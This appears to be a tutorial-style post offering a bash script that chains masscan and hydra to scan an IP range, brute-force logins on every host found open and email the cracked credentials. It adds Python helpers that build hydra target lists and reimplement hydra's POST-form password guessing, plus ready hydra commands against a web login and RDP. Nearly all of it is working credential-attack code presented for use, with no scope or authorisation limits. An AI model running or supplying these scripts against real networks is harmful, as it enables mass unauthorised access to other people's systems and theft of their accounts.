A script I wrote: given the parameters, masscan scans the range for hosts with the port open and saves them, hydra then runs a batch dictionary attack against those hosts, and when it finishes the result file is attached to a mail sent to the specified mailbox.


#!/bin/bash
# Usage: ./scan_burp.sh <ip-range> <port> <hydra-service> <user-dict> <pass-dict>
# 1. masscan the range for the port, 2. hydra the hosts found open, 3. mail the result file.

if [ $# -ne 5 ]; then
    echo "Usage: $0 <ip-range> <port> <hydra-service> <user-dict> <pass-dict>" >&2
    exit 1
fi

ip=$1
port=$2
server=$3
user_dic=$4
pass_dic=$5

mail="**your-mailbox@qq.com"
Title=""
Message="Over"

target_scan="targets/scan/${port}"
target_rslt="targets/rslt/${port}"
scan_file="${target_scan}/${ip%/*}_${port}.scan"    # masscan -oL output
ip_file="${scan_file}.ip"                            # one host per line, fed to hydra -M
rslt_file="${target_rslt}/${ip%/*}_${port}.rslt"    # hydra -o output

mkdir -p "${target_scan}" "${target_rslt}"

echo "Start scanning:"
echo "masscan -p ${port} --range ${ip} -oL ${scan_file}"
masscan -p "${port}" --range "${ip}" -oL "${scan_file}"

# masscan -oL writes one "open tcp <port> <ip> <timestamp>" line per hit plus '#' comment lines
declare -i s_count
s_count=$(grep -c -v '^#' "${scan_file}")

if [ "${s_count}" -eq 0 ]; then
    Title="${ip}:${port} no open ports"
    Message="Failed"
    echo "${Message} ${Title}"
    echo "${Message}" | mutt -s "${Title}" -- "${mail}"
    exit 1
fi

echo "Dealing....."
# the 4th field of an "open" record is the IP address
awk '$1 == "open" {print $4}' "${scan_file}" | sort -u > "${ip_file}"

echo "Burping:"
echo "hydra -M ${ip_file} -L ${user_dic} -P ${pass_dic} -V -o ${rslt_file} ${server}"
hydra -M "${ip_file}" -L "${user_dic}" -P "${pass_dic}" -V -o "${rslt_file}" "${server}"

# no result file at all: hydra found nothing to write
if [ ! -f "${rslt_file}" ]; then
    Title="${ip}:${port} brute force failed"
    Message="Scanned ${s_count} hosts, cracked none"
    echo "${Message} ${Title}"
    echo "${Message}" | mutt -s "${Title}" -- "${mail}"
    exit 1
fi

# hydra's -o file starts with '#' header lines; every other line is a cracked login
declare -i c_count
c_count=$(grep -c -v '^#' "${rslt_file}")
if [ "${c_count}" -ne 0 ]; then
    Title="${ip}:${port} hosts cracked!"
else
    Title="${ip}:${port} no hosts cracked!"
fi
Message="Scanned: ${s_count}  cracked: ${c_count} hosts!"
echo "${Message} ${Title}"
echo "${Message}" | mutt -s "${Title}" -a "${rslt_file}" -- "${mail}"
exit 0
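The step in the script that turns masscan's list output into the hydra target file keeps only the IP column, so when the port argument is a list such as 22,2222 hydra never learns which port each host actually answered on. The following added example (my code, not the post's script) parses masscan's -oL output into the one-target-per-line file that hydra -M expects: comment lines and banner records are skipped, hosts are de-duplicated, and a host found open on a port other than the one hydra is given is written as host:port, which the -M file accepts. The masscan output it parses is a constructed sample, and it deliberately limits itself to IPv4 because the host:port form relies on the colon.

```python
"""Convert masscan -oL list output into a hydra -M target file.

Added example, not code from the original post. masscan's list output is
'#' comment lines plus records 'open tcp <port> <ip> <timestamp>' (and
'banner ...' records when --banners is used); hydra's -M file takes one
target per line and accepts host:port to override the command-line port.
"""
import ipaddress

# Constructed sample of a masscan -oL file for '-p 22,2222' (not real scan data).
SAMPLE_SCAN = """\
#masscan
open tcp 22 10.0.0.5 1610000000
open tcp 2222 10.0.0.9 1610000001
banner tcp 22 10.0.0.5 1610000002 ssh SSH-2.0-OpenSSH_8.4
open tcp 22 10.0.0.5 1610000003
open tcp 22 10.0.0.7 1610000004
# end
"""


def parse_masscan_list(text):
    """Yield (ip, port) for every TCP 'open' record; skip comments and banners."""
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0] != "open":
            continue                       # 'banner' and other record types
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: malformed masscan record {line!r}")
        proto, port, ip = fields[1], fields[2], fields[3]
        if proto != "tcp":
            continue                       # the hydra services used here are all TCP
        ipaddress.IPv4Address(ip)          # reject garbage (and IPv6) before hydra sees it
        yield ip, int(port)


def hydra_targets(text, default_port):
    """Return sorted, de-duplicated lines for hydra -M.

    A host open on default_port is written bare; any other port is written
    as host:port, so hydra attacks the port masscan actually found open
    instead of silently retrying default_port on that host.
    """
    targets = set()
    for ip, port in parse_masscan_list(text):
        targets.add(ip if port == default_port else f"{ip}:{port}")
    return sorted(targets, key=lambda t: (ipaddress.IPv4Address(t.split(":")[0]), t))


def write_targets(text, default_port, path):
    """Write the -M file and return how many targets it holds."""
    lines = hydra_targets(text, default_port)
    with open(path, "w") as fh:
        fh.write("".join(line + "\n" for line in lines))
    return len(lines)


if __name__ == "__main__":
    print("\n".join(hydra_targets(SAMPLE_SCAN, 22)))
```

With the sample above and a default port of 22, the file holds 10.0.0.5, 10.0.0.7 and 10.0.0.9:2222; the duplicate 10.0.0.5 record and the banner line are dropped, and only the last host carries an explicit port.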

Brute-forcing a web login that is submitted via POST:


hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form "index.php:name=^USER^&pwd=^PASS^:F=<title>invalido</title>:H=Cookie:....."
<form action="index.php" method="POST">
<input type="text" name="name" /><br><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="Submit">
</form>

Explanation: the username being attacked is admin, the password dictionary is pass.lst, results are saved to ok.lst, -t 1 sets the number of parallel tasks to 1, -f stops as soon as one valid password is found, the IP (the local host here) is the target, and http-post-form selects the module that attacks a form login submitted by HTTP POST.

The module string that follows names the path and the name attributes of the corresponding form fields; the <title> text at the end is the response marker for a wrong guess (F=), which should be adjusted to whatever the target returns. hydra treats any response that does not contain the F= string as a successful login, so a marker the page never contains makes every attempt look like a hit; if a distinctive success string exists, S= can be used instead.
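To make the F= semantics concrete, here is an added example (my code, not hydra's and not from the original post) that replays the http-post-form check against a throwaway local login endpoint: it parses a hydra-style module string (path, body template, F=/S= marker, H= headers), substitutes ^USER^ and ^PASS^, POSTs each candidate, and judges a guess valid exactly as described above. The endpoint, its single valid credential and the wordlist are constructed for the demo; form-encoding the substituted values is my choice, not something the page states about hydra. Running it shows the correct marker yielding one hit, and a wrong marker turning every guess into a false positive.

```python
"""Hydra-style http-post-form check, replayed against a throwaway local login
endpoint. Added example, not hydra's code or the original post's; the endpoint,
the valid credential and the wordlist are all constructed for the demo."""
import http.server
import threading
import urllib.parse
import urllib.request

VALID = {"admin": "letmein"}            # constructed credential on the fake target


class _LoginHandler(http.server.BaseHTTPRequestHandler):
    # Stands in for index.php: a wrong guess returns <title>invalido</title>.
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        ok = VALID.get(fields.get("name", [""])[0]) == fields.get("pwd", [""])[0]
        body = b"<title>welcome</title>" if ok else b"<title>invalido</title>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # keep the demo output quiet
        pass


def start_target():
    """Start the fake login endpoint on an ephemeral 127.0.0.1 port."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def parse_spec(spec):
    """Split 'path:body:F=...|S=...[:H=Name: value]...' the way hydra reads it."""
    path, body_tpl, rest = spec.split(":", 2)
    fail, succ, headers, last = None, None, [], None
    for tok in rest.split(":"):
        if tok.startswith("F="):
            fail, last = tok[2:], "F"
        elif tok.startswith("S="):
            succ, last = tok[2:], "S"
        elif tok.startswith("H="):
            headers.append(tok[2:])
            last = "H"
        elif last == "H":                # 'H=Cookie: a=b' was split on its own colon
            headers[-1] += ":" + tok
        elif last == "F":
            fail += ":" + tok
        elif last == "S":
            succ += ":" + tok
        else:
            raise ValueError(f"unexpected token {tok!r} in module spec")
    if fail is None and succ is None:
        raise ValueError("spec needs an F= (failure) or S= (success) marker")
    return path, body_tpl, fail, succ, headers


def http_post_form(base_url, spec, user, passwords, stop_first=True):
    """Try each password like hydra's http-post-form module: a guess counts as
    valid when the S= string is present, or (with F=) the F= string is absent."""
    path, body_tpl, fail, succ, headers = parse_spec(spec)
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    found = []
    for pw in passwords:
        # Form-encoding the substituted values is my choice, not a hydra detail.
        body = (body_tpl.replace("^USER^", urllib.parse.quote(user, safe=""))
                        .replace("^PASS^", urllib.parse.quote(pw, safe="")))
        req = urllib.request.Request(f"{base_url.rstrip('/')}/{path}",
                                     data=body.encode(), method="POST")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        for header in headers:
            name, _, value = header.partition(":")
            req.add_header(name.strip(), value.strip())
        with opener.open(req) as resp:
            page = resp.read().decode(errors="replace")
        hit = (succ in page) if succ is not None else (fail not in page)
        if hit:
            found.append((user, pw))
            if stop_first:              # hydra -f: stop at the first valid pair
                break
    return found


if __name__ == "__main__":
    srv = start_target()
    url = f"http://127.0.0.1:{srv.server_address[1]}"
    words = ["123456", "password", "letmein", "qwerty"]
    spec = "index.php:name=^USER^&pwd=^PASS^:F=<title>invalido</title>"
    print("correct marker:", http_post_form(url, spec, "admin", words))
    # A marker the page never contains makes every guess look valid:
    print("wrong marker:  ", http_post_form(url, spec.replace("invalido", "wrong"),
                                            "admin", words, stop_first=False))
    srv.shutdown()
```

Before pointing hydra at a real form, submit one known-bad guess by hand and confirm the F= text really appears in that response; the second run above is what an untested marker looks like in the result file.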

Scanning and brute-forcing RDP (port 3389):

hydra ip rdp -l administrator -P pass.txt -V